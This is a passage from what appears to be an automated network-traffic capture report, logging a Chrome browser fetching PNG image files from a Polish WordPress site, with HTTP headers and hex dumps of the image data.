                                                            Data Ascii: PNGIHDR,{=pHYs.#.#x?v IDATxxSWmJ.m6c`Pw)R(jPoiBFnI=}rs{E@L0C)=|0?,,9h`<w7l9@h7wY<H|3I6y|&T
                                                            2025-01-15 10:08:07 UTC8000INData Raw: 89 0e 0d c3 d0 66 da 56 5e f1 9c fc 7e 08 9a 17 1a bb 65 ef 94 18 c5 a2 38 04 85 c0 63 db 5e a4 f5 ef 5e e4 9a 74 7f 04 9c c6 ce d0 79 7f ed 0a 95 88 62 5d d6 19 46 95 a7 11 93 b4 5e 7b b3 6e 39 84 95 f1 c2 c3 67 ba 9b 43 2e ad 79 07 f5 2a 97 3c 17 4d 25 4a b1 28 b4 85 dd 63 e7 01 a4 f5 ee a4 76 3e f7 a5 fe 0e e1 8e 8d 82 b0 ef 0c 7f c5 0a f0 d6 3d fb e6 d7 59 dd d0 72 f2 66 ad d7 6f 6e 1c 8d 6a 21 3e bc 9f 67 4f 94 38 c5 a2 38 94 f2 85 e7 ee 23 48 7d bb 9d da f9 bc 3b 91 70 ac a2 dd 83 4d f7 e6 e5 30 75 05 bf 67 94 2e a5 7f d6 4d d3 ea da b3 b7 e8 2d 63 51 21 d0 a6 5d 5c 99 44 89 54 2c 0e 0f 2f 78 fe 75 1c a9 5d 5b 29 4f 65 7f 35 1d e2 cd 07 b5 de 52 21 d0 9d 77 f4 49 a9 fa 2d a0 50 a0 b9 02 f2 68 fb 78 04 fb f3 7f 96 3d 52 72 15 8b e2 2a 86 e7 c1 93 48
                                                            Data Ascii: fV^~e8c^^tyb]F^{n9gC.y*<M%J(cv>=Yrfonj!>gO88#H};pM0ug.M-cQ!]\DT,/xu][)Oe5R!wI-Phx=Rr*H
                                                            2025-01-15 10:08:07 UTC3166INData Raw: 16 b4 44 48 19 34 47 7e 0f 35 5a 74 75 69 ba 35 19 bf 49 e9 1a 87 3e 5b d5 19 23 f5 1e f1 e1 a0 c6 9c 0b 9d 1a ef fc 4c 0c 9d dc e0 b8 3a bf f2 0b ef 4a d2 90 a6 3b e5 6a 74 02 8e 5f 95 2f 72 4b 3d a6 2a 32 94 a1 1d 8c 73 fb cc d0 0d 33 58 66 a2 07 29 4d 6d ba 15 c7 7d 90 94 c4 94 4c 3c 89 4f 41 a9 f2 fa 9d e4 bd 48 cb 41 6c 42 2a 2a 95 2d c5 b5 d9 a8 12 50 ca 15 15 cb 7a e0 b7 ff ee 63 cd fe 3b 90 a4 bc 5a ba be ac af 3b 57 92 53 40 ab 47 79 b9 45 ab 48 79 2a d5 26 da 03 17 52 46 ff ea 31 aa b1 34 d0 e2 25 21 89 c8 bd e1 c0 ab 2a dd 85 3b cf e0 f0 e6 02 bd 71 53 43 2b 34 70 48 c7 f2 1d ea 9e 4e 69 49 4e 1b a3 89 31 51 18 2c 0a 75 7f 43 0d 96 02 d5 8c c5 91 33 58 45 e3 c8 2b b4 8c bc c0 51 b3 fb 1c d5 b8 e8 32 62 0c cb c2 0c 96 99 f8 71 78 33 dc 39 97 82
                                                            Data Ascii: DH4G~5Ztui5I>[#L:J;jt_/rK=*2s3Xf)Mm}L<OAHAlB**-Pzc;Z;WS@GyEHy*&RF14%!*;qSC+4pHNiIN1Q,uC3XE+Q2bqx39


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            122192.168.2.1649183178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:07 UTC417OUTGET /wp-content/uploads/2015/07/disney_captain_jackie.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:07 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:07 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:19 GMT
                                                            ETag: "a9eb-620a8b4c7a857"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 43499
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:07 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 00 72 7c 88 ab 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e1 02 1c 15 34 34 f1 b0 bf 19 00 00 20 00 49 44 41 54 78 da ec bd 59 8c 65 f7 7d e7 f7 f9 6f 67 b9 6b dd da ba bb 7a ef a6 48 91 12 a9 85 54 2c d9 a2 2d db e3 75 96 cc 18 09 02 04 01 92 3c 24 f0 43 10 bf 64 f2 18 cc e4 39 2f 59 91 e5 21 08 10 04 08 02 8c 67 06 1e db 93 b1 0d cb c6 c8 5a 48 4a dc 9a 64 b3 f7 ea da ab ee 7e ef d9 fe 4b 1e ce 6d 8a 12 a4 b1 62 8b f4 76 3e 40 a1 80 aa ba f7 9e fb af fb ff 9e df fe 87 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86
                                                            Data Ascii: PNGIHDR,r|bKGDpHYs.#.#x?vtIME44 IDATxYe}ogkzHT,-u<$Cd9/Y!gZHJd~Kmbv>@
                                                            2025-01-15 10:08:07 UTC8000INData Raw: 41 5a 41 22 75 3d ce 2f d4 73 ad c4 93 59 ed 61 15 0f 5a b9 88 d6 3b 2a ad 68 ef 0c b8 78 75 8d 41 b6 a4 7c e3 31 87 87 67 dc 4c 07 f4 a3 0e 76 39 47 96 05 c6 7b 54 00 f1 c1 4c f6 d5 e0 bf 10 56 2d 8f 4f dc d0 ba 15 8b e0 10 42 ac c4 cb e1 7d dd 13 a8 a3 08 13 c7 8c 46 13 16 8b ec 83 64 4c 5d 87 a5 3e 98 a3 a5 75 7d b3 43 aa c6 ca 6a 04 eb e3 c1 56 f5 c4 4c 67 6d 2d 58 a1 6e 79 51 4a d4 9b 49 28 bc 0f 58 5b e1 82 c5 3f 99 ff 1e c4 aa 4a 5a e2 42 c0 7a 20 4e 08 78 86 d3 21 cb 49 46 5a 06 d2 c2 13 97 1e e3 ea 02 d5 65 b0 9c 84 29 dd 6b cf f0 f2 df fd 59 ce 5d 3d 87 9d 8f 39 3e 3d c0 c4 11 9d 4e 8f 1b 4f 5d e1 67 7f e5 8b 54 ba 60 e7 c2 79 b2 bc c4 4f a6 e8 d1 9c f5 a0 f8 dc f9 1b 64 91 40 4e 2a ec a2 ac af 59 09 12 ad 88 5d 60 76 78 cc 72 e7 8c b6 8e d0 4a
                                                            Data Ascii: AZA"u=/sYaZ;*hxuA|1gLv9G{TLV-OB}FdL]>u}CjVLgm-XnyQJI(X[?JZBz Nx!IFZe)kY]=9>=NO]gT`yOd@N*Y]`vxrJ
                                                            2025-01-15 10:08:07 UTC8000INData Raw: a2 6e 10 97 3d 86 fb 3d 06 bd 21 54 d5 14 d7 63 c2 c2 63 ba a1 f5 5e 20 a3 88 ba ca 39 9c 0c f8 62 7c c4 26 63 0c d0 21 66 41 67 b8 96 c6 ce 44 74 97 66 99 5b 5a 62 76 76 0e 25 3d cd 46 42 bb d3 64 79 79 1e 8f 23 8b 13 1e 3e da 60 7b 67 87 73 67 cf 30 37 d3 26 d2 27 98 ec f0 e2 12 52 a2 b5 0e 73 2a 1d a1 84 c4 9a 1a 6f 2a 84 0c b4 d8 24 4d 20 f7 a7 78 99 d3 82 f5 ff 57 d5 f2 cf 5a 80 30 75 75 38 63 42 72 8c 20 28 9c 95 0a 74 07 17 06 da 35 9e fe 70 80 54 82 6e a7 8d d6 12 6f 83 6a ba c8 27 0c 07 43 d2 2c 23 4d 52 94 94 d8 aa a2 ae 4b 44 9a a1 23 8d 54 92 ba 32 e1 e6 45 31 a6 aa 30 65 45 24 13 92 28 82 4a 71 ef c3 cf b9 ff d9 7d c6 07 7d 8e 0f 8e 28 f2 09 59 23 e2 fa 4b 37 78 fd cd ef 92 8a 84 4c 25 c8 93 4a 2a bf 7a d9 fb 69 12 b5 90 8a 46 da 22 56 29 be
                                                            Data Ascii: n==!Tcc^ 9b|&c!fAgDtf[Zbvv%=FBdyy#>`{gsg07&'Rs*o*$M xWZ0uu8cBr (t5pTnoj'C,#MRKD#T2E10eE$(Jq}}(Y#K7xL%J*ziF"V)
                                                            2025-01-15 10:08:07 UTC8000INData Raw: 7c f4 c1 23 9e 6c 6e d3 6e 78 ce 9f bb c0 4c fb 0c bf fa c5 27 8c 7a 39 55 3e 46 4e 11 c7 e2 6b c2 e1 13 1d d6 64 32 c1 18 8b 9c b2 cc b4 8e 50 2a 0a c1 14 c6 9c ce b0 4e 0b d6 73 59 0f 3e b3 5a 38 ef 42 c4 44 30 16 06 6d d5 49 1a b4 b3 e4 75 c5 68 3c 20 2f c6 44 cd 78 6a 62 0e ba a4 24 e9 a0 75 83 a2 ac 68 34 60 71 21 66 fd 8c e4 f0 08 b6 b6 72 f2 22 c7 7a d8 7c 0c 55 0d 2b ca f3 f4 c9 01 e3 e1 90 46 02 2f bf b0 cc ad cb eb 74 74 cd 4f 7f b5 c9 6f 3e b8 43 ab 9d 72 ed fc 59 1a 89 23 4d 0c 42 d4 54 95 a5 ac c1 0b 4f b7 9b a2 94 e7 d1 83 7d de 7d e7 31 87 07 8e 2b d7 52 bc 6c d1 3b ce 51 ca 12 e9 8a aa 1c 30 37 ab 58 5b 85 8d a7 d0 6a cd f0 cd 57 5f 64 69 46 93 0f fa 24 51 8c a4 42 09 41 12 79 c6 83 63 9e 3c 7d c8 83 87 b0 b3 13 22 13 97 56 23 5e be 72 89
                                                            Data Ascii: |#lnnxL'z9U>FNkd2P*NsY>Z8BD0mIuh< /Dxjb$uh4`q!fr"z|U+F/ttOo>CrY#MBTO}}1+Rl;Q07X[jW_diF$QBAyc<}"V#^r
                                                            2025-01-15 10:08:07 UTC8000INData Raw: 6f 32 21 cb 52 b6 77 f7 48 e6 29 38 12 25 2d 4a 40 26 4b 76 0e b6 f1 f6 22 56 b6 96 70 dc 18 e3 80 c1 d2 e9 76 89 e2 26 1b 6b eb 9c 1e ef 73 7c b8 43 99 e7 8c 4e 87 0c 47 63 e2 56 87 66 b3 4b 18 b6 70 3c bf 1e 40 ab 8c d8 f7 18 74 4b 96 16 7d 5e bf b9 c5 b5 2b 17 78 f8 64 4a 92 65 9c 8c 4e b9 bc d1 e6 2f ff e4 f7 58 e8 78 ec ec 9d f2 8f 1f bf 64 f7 e8 88 d0 1b 60 75 4e 3a 4f b8 f7 60 4c c9 02 b7 de b9 c1 9d a7 3b 1c 9c 4e 79 f5 b5 1b 7c 78 9a f1 c5 97 5f e0 bf da e2 da b5 55 de 7c fd 0a 8f 9f 1d 52 94 75 25 76 65 bd 4b 91 4c 58 68 54 6c 5c 0c d9 7a 73 8b 66 cb 25 9d 8c f9 f4 ee 0b 9a 1d 97 f5 cd 26 87 47 23 ee df 2f f9 ec 4b 58 da ba c8 2b 2b 0d 3e f9 f5 03 ca 32 61 7a 72 44 32 d9 e7 d1 dd 23 ee 3f 84 02 58 be e0 f2 d6 7b b7 78 ef 3b ef 72 e5 f2 3a c3 e3
                                                            Data Ascii: o2!RwH)8%-J@&Kv"Vpv&ks|CNGcVfKp<@tK}^+xdJeN/Xxd`uN:O`L;Ny|x_U|Ru%veKLXhTl\zsf%&G#/KX++>2azrD2#?X{x;r:
                                                            2025-01-15 10:08:07 UTC3564INData Raw: 7b 3b db ec ec 6c b1 fc d6 05 6a b3 cb 94 01 59 e5 2c 72 f1 23 6a 86 95 fa 22 2b ef 67 c5 47 41 04 32 e2 2b 59 25 1d 61 9d 7a 9e de e1 58 f4 fb fd 8f b6 b7 b7 7e f3 f6 db 57 ca 8e 96 61 b2 11 49 af 43 3a 78 8a d0 31 8f ee ff 33 f7 ee fe 81 3c 2f a6 d8 3d 15 70 f5 ea 7b 5c ba 7c 05 19 55 e8 f5 87 74 9e 6c d3 e9 74 69 2f bc c5 cd 1f fe 04 8b 22 8e 63 c2 b0 52 14 e8 4c 92 22 15 0d 94 59 00 4d 51 7a 4a 88 72 1d b5 29 b5 9e 45 58 83 c9 52 6c 6e 90 61 85 a0 3e 43 58 9b 21 ee 0f 99 8c 13 a4 1f 10 56 6b 84 d5 08 44 11 3c 99 c4 e3 32 22 de 47 08 55 46 9a 3f 97 50 ce 94 ca 03 5b 3a bc 75 99 39 35 c3 5a cd b3 4c 99 d6 16 a9 73 ca ff 8b dc 5f c5 f6 85 1a 52 20 3c 82 4a 95 4a a5 5a 94 69 d7 39 b5 5a 0d a1 04 3a cb 18 f6 fa 48 e5 53 6b cd 22 fd 80 67 f9 24 f7 af 61 3f
                                                            Data Ascii: {;ljY,r#j"+gGA2+Y%azX~WaIC:x13</=p{\|Utlti/"cRL"YMQzJr)EXRlna>CX!VkD<2"GUF?P[:u95ZLs_R <JJZi9Z:HSk"g$a?


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            123192.168.2.1649184178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:07 UTC654OUTGET /wp-content/uploads/2015/07/tesco_glowna_thumb.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:07 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:07 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:20 GMT
                                                            ETag: "39db-620a8b4d62f03"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 14811
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:07 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 01 05 7b b8 3d 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 20 00 49 44 41 54 78 9c ed 9d 07 7c 14 65 fe ff 3f b3 35 d9 54 5a e8 84 22 1d 0c d2 c1 03 54 f4 50 f4 94 a6 22 f6 b3 a2 62 2f 67 bb ff 9d 1d 0b c8 71 3f 3d cf 8e a8 27 16 94 53 2c 28 9c a2 22 48 35 84 a6 f4 1e 42 48 b2 c9 26 5b e7 ff 7d 66 77 93 dd 64 37 d9 49 76 d9 19 fc be 79 0d 99 9d 79 e6 99 ef 3c f3 99 ef f3 7d 9e 79 66 c6 24 cb 32 b4 88 29 d9 06 44 83 0d 53 cb 89 61 d8 ae 5d bb e4 ce 9d 3b 37 65 7f 52 ac 09 d5 18 d6 54 a3 94 3c 10 a3 71 c7 fd 54 ae 5a b5 6a cd d0 a1 43 07 35 94 ee b8 1b 66 b7 db 07 c6 92 ee c4 10 ff f1 e4 c4 30 ac f4 e4 ee 74 4d d1 45 45 f5 6b d6 2f bf 56 ff ce da b0
                                                            Data Ascii: PNGIHDR,{=pHYs.#.#x?v IDATx|e?5TZ"TP"b/gq?='S,("H5BH&[}fwd7Ivyy<}yf$2)DSa];7eRT<qTZjC5f0tMEEk/V
                                                            2025-01-15 10:08:07 UTC6876INData Raw: 96 6c 3b b4 8c 78 3c ee d8 b1 63 68 de bc b9 b3 e1 d4 c7 1f 4d 0a 2b 23 23 e3 0b a7 d3 39 c9 64 d2 a4 79 9a 40 78 ab 3d 7b f6 a0 6d db b6 85 c9 b6 25 12 9a 3c 73 83 06 0d 9a bd 7f ff fe 49 27 9d 74 92 a6 bf be 90 4c dc 6e 37 f6 ed db 77 6c e4 c8 91 07 93 6d 4b 24 34 29 2c f2 58 9b be f9 e6 1b 6f 6e 6e ae d1 6a b5 26 db 1c cd 21 bc 55 71 71 31 86 0c 19 72 2b fd ac e7 8d 28 c9 43 93 c2 92 24 a9 b8 77 ef de 37 1d 3a 74 e8 a5 0e 1d 3a 70 10 1f 82 88 ad aa aa aa f0 c3 0f 3f 78 26 4f 9e bc 24 d9 f6 44 43 93 c2 12 f4 ec d9 f3 c3 d7 5e 7b ed 29 2a bc 66 99 99 99 5c 25 06 10 55 e0 b6 6d db 30 74 e8 d0 2b a8 4c 0e 27 db 9e 68 68 56 58 e4 b5 8e 4e 9d 3a f5 9c 4f 3f fd f4 87 73 ce 39 c7 98 9e 9e fe bb 17 97 cb e5 02 c5 9e d8 b1 63 c7 ab 93 26 4d 5a 98 6c 7b ea 43 b3
                                                            Data Ascii: l;x<chM+##9dy@x={m%<sI'tLn7wlmK$4),Xonnj&!Uqq1r+(C$w7:t:p?x&O$DC^{)*f\%Um0t+L'hhVXN:O?s9c&MZl{C


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            124192.168.2.1649185178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:07 UTC415OUTGET /wp-content/uploads/2015/07/disney_mickey_mouse.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:07 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:07 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:11 GMT
                                                            ETag: "59be-620a8b449ce45"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 22974
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:07 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 00 72 7c 88 ab 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e1 02 1c 16 0c 20 fe b3 69 c6 00 00 20 00 49 44 41 54 78 da ec bd 79 94 5d 57 75 e7 ff 39 e7 0e 6f ae 57 73 95 4a f3 64 c9 92 e5 49 9e 6d 62 c0 36 83 cd 90 30 84 90 10 48 9a 0e a1 d3 e9 90 ee 5f f3 eb 64 a5 7f 49 08 49 3a bd 92 0e 81 40 87 84 4e 48 02 21 4c 01 0c 06 8c 0d 36 d8 b2 6c cb b2 d0 58 9a 4a 52 0d aa 79 7a f3 7d 77 38 e7 fc fe 78 55 65 c9 43 3a 0c 36 26 39 9f b5 de 92 56 bd e1 de b7 df 3d df bb f7 3e fb ec 03 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1
                                                            Data Ascii: PNGIHDR,r|bKGDpHYs.#.#x?vtIME i IDATxy]Wu9oWsJdImb60H_dII:@NH!L6lXJRyz}w8xUeC:6&9V=>bX,bX,bX,bX,b
                                                            2025-01-15 10:08:07 UTC8000INData Raw: ad 3f 8f 4c 15 5b 02 a6 43 48 ea 90 d4 68 d4 16 49 e5 57 d3 c8 ae 62 5f a5 c4 a0 49 98 12 9a 05 0c 0d 29 08 a4 20 30 9a 5c a2 e8 9a 5f e4 3c 53 fc fc 96 6d 80 42 a1 31 28 b4 d0 e8 56 b5 14 2e 29 04 ee 92 4f 63 50 44 cc 34 27 69 7a 15 22 d9 c0 18 85 94 92 b1 c9 29 7a f3 ab d9 51 b8 02 07 0f 9e e6 33 99 8b 72 f4 4f 79 9d cb 5d 2c 5a 56 7c e6 c0 5e d4 b0 bf bc c8 a2 23 49 39 82 0e c7 85 b9 05 76 f5 f7 b1 c6 4d ad fc 06 e6 69 12 29 31 68 42 e6 f4 14 f3 72 9c 93 c1 01 ce 47 43 d4 59 44 0b 45 9a 3c c5 b8 8f 75 e6 52 ae eb be 15 49 07 82 74 ab 47 98 11 ad 90 f3 e9 bf c5 ca 91 96 bf 89 b3 f4 68 75 71 c8 e7 f3 f4 f7 f7 73 f0 e0 41 b2 b9 2c eb d6 ae 59 ba 56 ac 60 59 c1 7a e1 43 45 52 a9 d4 33 66 7c 62 60 38 0a 99 f2 25 e7 3c cd 48 d0 20 96 82 64 f4 3c dd 43 c3 fc
                                                            Data Ascii: ?L[CHhIWb_I) 0\_<SmB1(V.)OcPD4'iz")zQ3rOy],ZV|^#I9vMi)1hBrGCYDE<uRItGhuqsA,YV`YzCER3f|b`8%<H d<C
                                                            2025-01-15 10:08:07 UTC7039INData Raw: 10 33 52 08 4d 32 f9 e9 7f c9 9b 27 cf f0 87 7f f1 23 26 0f 44 18 ec 8f e1 7b 3e 8b cb 1b cc 2e ac 33 bd a0 d3 4c 7f 98 8f fd f2 6f 31 7a e4 18 a6 68 2d 82 f5 e4 be 61 a6 5e fd 01 f6 c6 3a 19 3b 42 2e 96 e0 d0 d1 87 39 3c 3c c2 d8 e0 10 fb f6 ed eb 26 c7 b6 6c 0f 9d 98 d6 43 6f 38 80 bf 60 73 b9 b8 c4 da d9 3c b5 e9 08 75 a7 8e ef fa 44 cc 18 57 de c8 73 5e bf 46 a2 3f 41 79 26 c0 0c a2 18 b1 1e 7e f3 df ff 47 e2 fd c3 bc fd fd bf e1 72 7e 9e cb 9b 9b 68 b5 2a 06 60 b5 5f 02 da 53 6b da b5 d8 4d 0b e2 31 ac de 3e fa 8e 1c e6 f0 e4 24 c3 0f 3f cc 70 2c c5 27 7b b2 fc cf af ff 05 b9 13 4f 92 1a 1a 42 d8 36 32 08 08 36 ab ac cc 5c 61 fd 95 d7 18 5d 2b f0 d5 e3 4f 71 fc c1 c9 ee 74 a8 21 67 98 7f f2 f4 bf e0 a1 c1 0f f3 bd b7 5e e0 8d 8b af 73 ed dc 0a 81 f0
                                                            Data Ascii: 3RM2'#&D{>.3Lo1zh-a^:;B.9<<&lCo8`s<uDWs^F?Ay&~Gr~h*`_SkM1>$?p,'{OB626\a]+Oqt!g^s


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            125192.168.2.1649186178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:07 UTC651OUTGET /wp-content/uploads/2015/07/mm_glowna_thumb.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:07 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:07 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:10 GMT
                                                            ETag: "3818-620a8b43b7678"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 14360
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:07 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 01 05 7b b8 3d 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 20 00 49 44 41 54 78 9c ed 9d 07 78 15 55 fa c6 df 54 48 0f 2d 74 02 84 8e 48 09 08 a2 20 88 ae 82 ba 54 0b 56 5c 2b fa 57 d7 de 75 bb ba ba ab ae ae ae ba 2a 76 d6 2e 56 44 41 c5 02 28 bd 28 28 25 a1 43 08 90 90 de fe ef 77 cf bd e4 12 6e 92 3b 61 2e 77 06 bf df f3 4c ee 64 e6 cc 99 6f ce 7c e7 3d df 39 d3 a2 ab aa aa e0 44 a2 c3 6d 40 6d a8 61 56 39 32 0c db b0 61 43 55 c7 8e 1d 0f 65 7f 11 c1 26 b4 62 d8 a1 1a e5 c9 03 41 1a 77 d8 4f e5 82 05 0b 16 1e 73 cc 31 99 f5 a5 3b ec 86 e5 e7 e7 0f 08 26 dd 91 e1 fc 87 13 35 cc 2a 41 1b 56 51 55 61 66 22 b9 c9 a6 4d 40 9b 56 e6 ff c5 cb 80 fe 47
                                                            Data Ascii: PNGIHDR,{=pHYs.#.#x?v IDATxxUTH-tH TV\+Wu*v.VDA(((%Cwn;a.wLdo|=9Dm@maV92aCUe&bAwOs1;&5*AVQUaf"M@VG
                                                            2025-01-15 10:08:07 UTC6425INData Raw: 5b f9 70 93 63 25 b2 57 94 c1 42 ef cc 82 8e 90 71 2d 9e 84 d2 23 2d 70 f7 21 ce c5 a9 75 59 59 59 6b 1e 77 51 5c 5c dc 72 6f d3 e8 0a 15 73 83 63 49 15 6e c6 c2 cd 64 0f 30 9a 85 5b ea 5d 5e db 8b 3c 03 45 f2 11 38 f0 e5 a2 55 7e cb 10 60 1e 38 f8 65 a4 f5 ed af b6 bc 03 ed 3f d0 b6 fe db 89 ba 7a 7a bb 72 ad 94 c7 1d 51 5e 5e 7e 34 55 2c 99 f3 bf 70 7d 29 1c 8e e3 1d 8b 4e d5 82 b5 b6 0f 9b 04 89 3b 5c 51 5b ed 46 1c 8c b1 a4 5c 7c 6e c3 30 20 8e ce b6 8c 8b cb c2 6d 57 5d 38 dd b1 92 58 4b bb b1 96 3a be 86 1e 0e e4 92 16 cb 22 9e ea d5 89 e1 80 28 97 63 6f 21 75 b2 63 45 b3 00 bb b2 00 eb 73 aa 9a cd 8e 15 ea da 36 50 d3 16 28 bd 7f ba ba f2 6d 88 9d 07 e5 2d 6d 24 1d 2c 95 4a de 44 ae a7 5a cc ef b0 e1 58 c7 62 c1 a5 d0 a9 a4 e9 6b 68 f3 17 28 ae 0a
                                                            Data Ascii: [pc%WBq-#-p!uYYYkwQ\\roscInd0[]^<E8U~`8e?zzrQ^^~4U,p})N;\Q[F\|n0 mW]8XK:"(co!ucEs6P(m-m$,JDZXbkh(


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            126192.168.2.1649187178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:07 UTC655OUTGET /wp-content/uploads/2015/07/saturn_glowna_thumb.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:07 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:07 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:08 GMT
                                                            ETag: "3503-620a8b41ef5c0"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 13571
                                                            Content-Type: image/png
